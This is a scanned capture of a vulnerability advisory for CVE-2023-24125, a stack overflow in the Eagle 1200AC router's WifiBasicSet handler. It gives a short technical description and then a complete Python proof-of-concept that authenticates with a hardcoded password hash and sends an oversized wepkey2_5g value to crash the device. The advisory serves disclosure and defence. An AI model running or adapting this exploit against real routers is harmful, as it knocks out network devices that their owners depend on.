oxnan.com
Open in
urlscan Pro
2a06:98c1:3120::c
Public Scan
URL:
https://oxnan.com/posts/WifiBasic_wepkey2_5g_DoS
Submission: On March 08 via api from US — Scanned from NL
Submission: On March 08 via api from US — Scanned from NL
Form analysis
0 forms found in the DOMText Content
* Home * About [CVE-2023-24125] DOS VIA WEPKEY2_5G PARAMETER IN EAGLE 1200AC DESCRIPTION Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey2_5g parameter at /goform/WifiBasicSet. ADDITIONAL INFORMATION In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey2_5g is stored into wl5g.extra.wep_key2 via SetValue. When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.wep_key2 and then stored into stack buffer wifi_buf_entry. Because the length of wepkey2_5g is not checked, the stack buffer can be overflowed if it is a large string. POC SCRIPT: import requests IP="192.168.38.1" logindata = { "username":"admin", "password":"81dc9bdb52d04dc20036dbd8313ed055" } def login(): for i in range(10): session = requests.Session() res = session.post(f"http://{IP}/login/Auth", data=logindata) try: passwd = session.cookies["password"] return passwd except: pass session = requests.Session() session.cookies.set("password",login()) payload = { "wepkey2_5g" : "A"*(0x1000), "security" : "wep" } res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload) print(res.status_code) res = session.post(f"http://{IP}/goform/WifiBasicGet") print(res.text) print(res)